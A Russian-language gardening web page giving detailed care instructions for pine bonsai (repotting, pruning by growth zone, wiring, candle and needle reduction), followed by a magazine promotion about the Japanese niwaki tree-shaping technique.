  • Пересадка.

Пересаживать сосну бонсай необходимо весной, пока почки не начнут набухать. Делать это нужно каждые два-три года. Молодое дерево нуждается в пересадке, как правило, на 4 – 5 год. Горную сосну можно пересаживать летом.

При пересадке бонсай из сосны не нужно промывать корни и пытаться вымыть старый грунт, наоборот, рекомендуется оставить некоторое количество старого грунта, так как в нем содержаться полезные для роста и здоровья сосны грибки.

Размножение.

Размножать можно двумя путями: из семян в апреле или черенками в течение лета.

Обрезка и формирование бонсай из сосны

Сосна считается одним из сложнейших деревьев для формирования бонсай ввиду того, что сам принцип обрезки сосны бонсай не схож с принципами обрезки других видов бонсай. Виной тому тот факт, что большинство растений растет в течение всего сезона, выпуская новые побеги и листья. У сосны же отмечается один всплеск роста во второй половине весны.

Следует понимать, что сосна имеет свои зоны роста, характеристиками которых обусловлена интенсивность обрезки.

Зоны роста бонсай из сосны

Зона 1 является наиболее активной. Эти ветви растут быстрее и активнее других.

Зона 2 средней силы.

Зона 3 является наименее активной зоной.

Необходимо понимать, что формирование бонсай сосны нужно проводить с раннего возраста дерева. Стволы старой сосны невозможно или очень сложно согнуть, они будут ломаться.

Сосны прекрасно переносят обрезку, если делать ее осторожно и не чаще раза в год. Обрезка не должна быть чрезмерно радикальной, иначе дерево может погибнуть.

 Обрезку следует проводить осенью, чтобы уменьшить потерю сока. Если нужно полностью удалить ветвь – делайте это ранней весной, так как «шрамы» будут заживать быстрее с весенним ростом.

Все раны после подрезки должны быть обработаны и запечатаны.

Формирование кроны бонсай сосны.

Формирование проводят с использованием проволоки. Существует несколько мнений о том, когда следует приступать к формированию сосны бонсай. Некоторые считают лучшим временем конец осени и зиму, когда дерево менее активно.

Другие энтузиасты бонсай рекомендуют проводить формирование летом, когда любое повреждение может быть устранено, так как дерево находится в фазе роста.

Однако, ввиду того, что в активной фазе сосновые ветки имеют свойство быстро увеличиваться в толщине, при наложении их весной или летом, мы рискуем получить к осени поврежденный ствол и ветви. При наложении проволоки осенью, мы можем оставить ее на дереве до следующего лета, ничем не рискуя.

Почки.

Для того, чтобы придать сосне нужный вид, необходимо ежегодно проделывать простые манипуляции с почками. Сосновые почки чаще всего возникают группами.

Для придания дереву нужного вида, вы можете оставить только нужные почки.

  Вспоминая о зонах роста, и о том, что верхние ветви растут быстрее нижних, следуйте простому правилу: оставляйте наиболее развитые почки на нижних ветвях и наименее развитые – на верхних.

Обрезка бонсай из сосны — верхние ветви

Обрезка бонсай из сосны — нижние ветви

Свечи.

Весной, почки, которые Вы сохранили, вытянутся в свечи, размеры которых не всегда можно предсказать. Эти свечи также можно подрезать в зависимости от Ваших нужд. Правило все то же.

Свечи, растущие в первой зоне дерева, должны быть сокращены гораздо больше, чем свечи из зоны 2 и 3. Не стоит обрезать все свечи сразу. Делайте это в течение 2 – 3 недель. Свечи из зоны 1 уменьшаются на ½ или 2/3.

Свечи из зоны 3 – не более чем на 1/3.

Выщипывание Игл

Выщипывание игл необходимая процедура для бонсай из сосны. Это действо позволяет воздуху и свету проникать сквозь внешнюю хвою, обеспечивая здоровье и силу внутренних побегов и ветвей. Это также способствует распространению энергии роста по всему дереву. Выщипывание игл – еще один из способов контролировать высоту и ширину бонсай сосны.

Выщипывание игл проводят с середины июля до осени. И старые, и новые иглы выщипываем в соответствии с их положением на дереве. Чем больше хвои на ветке, тем более активной она является; за счет уменьшения количества игл на активной ветке мы перераспределим энергию на менее активные зоны.

На рисунке (слева направо) показано как должна выглядеть хвоя после ощипывания:

Выщипывание игл бонсай сосны

  1. В зоне 3. На нижних ветках (оставляем больше);
  2. В зоне 2.
  3. В зоне 1. На верхушке оставляем меньше хвои.

На здоровом дереве бонсай можно оставить лишь 4 пары игл на верхних ветвях, 6 или 7 пар на среднем уровне и 8-12 на нижних ветках.

Обрезка игл.

Часто возникает необходимость (особенно если Вы имеете дело с черной сосной) уменьшить длину игл, чтобы облагородить образ дерева. Сократить длину игл можно за счет уменьшения количества воды и удобрений весной, однако не все мастера бонсай любят данный метод, так как он делает все дерево слабым.

В наши дни популярной становится новая техника, которая помогает уменьшить длину иглы, ограничивая время дерево должно расти его иглы, прежде чем рост замедляется или останавливается на зиму.

Техника заключается в следующем: побеги свободно растут весной и летом. В середине – конце лета обрезаются все иголки этого года.

Дерево пытается нарастить новые иглы – и ему это удается, однако иглы будут короче так как до зимы осталось вдвое меньше времени.

Эта техника должна выполняться только на полностью сформированном дереве сосны. Обрезку игл следует рассматривать как последнюю стадию развития бонсай сосны.

Источник:

Ниваки: мастер-класс по стрижке деревьев

Еще не так давно необыкновенными «облаками» в саду можно было любоваться только по телевизору или на страницах журналов. Сейчас это великолепие из садов Японии пришло и в сады средней полосы.

В прошлом году одна из тем рубрики Крупный план (издание «Цветок» №2 за 2017 год) была посвящена очень модному сейчас направлению садового дизайна – ниваки.

Это классическая японская техника стрижки и формирования деревьев и кустарников, несущая в себе не только внешне эстетическую функцию, но и внутреннюю философскую наполненность.

Да, работа непростая, вкладывать в нее нужно годы кропотливого труда. Но результат ошеломительный: сад превращается с настоящую сказку!

После публикации читатели буквально завалили редакцию письмами с просьбой рассказать подробнее о всевозможных нюансах формирования ниваки. Мы подумали и решили вместить максимально полную информацию об этом в новый журнал «Цветок.

Спецвыпуск «Ниваки: мастер-класс по стрижке» (№1 за 2018 год). Советы дают и специалисты-ландшафтники, и садоводы, уже попробовавшие формировать ниваки на личном опыте.

Воспользовавшись этими советами, создавать растения необычной формы теперь смогут в желающие.

Если вы решили попробовать свои силы в формировании ниваки, то подсказки Татьяны ЧЕРЕПКО, ландшафтного дизайнера из Минска, помогут вам справиться с поставленной задачей. Торопитесь – журнал уже поступил в продажу!

Ниваки или садовый бонсай: в чем разница

Хотя так и называют растения, сформированные в технике ниваки, с бонсаями они имеют только некоторое внешнее сходство. Ниваки не формируют как карликовые формы подрезкой корней и жесточайшей cтрижкой кроны, не выращивают в контейнерах, не ограничивают и в питательных веществах, регулярно не пересаживают. Просто стригут по определенным правилам.

И получается весьма стильно и для наших садов – необычно! Вероятнее всего, первый экземпляр ниваки создала сама природа, а человек лишь заметил и оценил предоставившуюся ему возможность повторять за нею. Выстриженные в технике ниваки деревья настолько преображаются, что порой трудно поверить, что видишь привычную прежде глазу сосну или ель.

Источник: https://art-fashn.ru/mylo/bonsaj-svoimi-rukami-master-klass-iz-sosny-podrobno-s-video-podborkoj.html

Дача и цветы
Добавить комментарий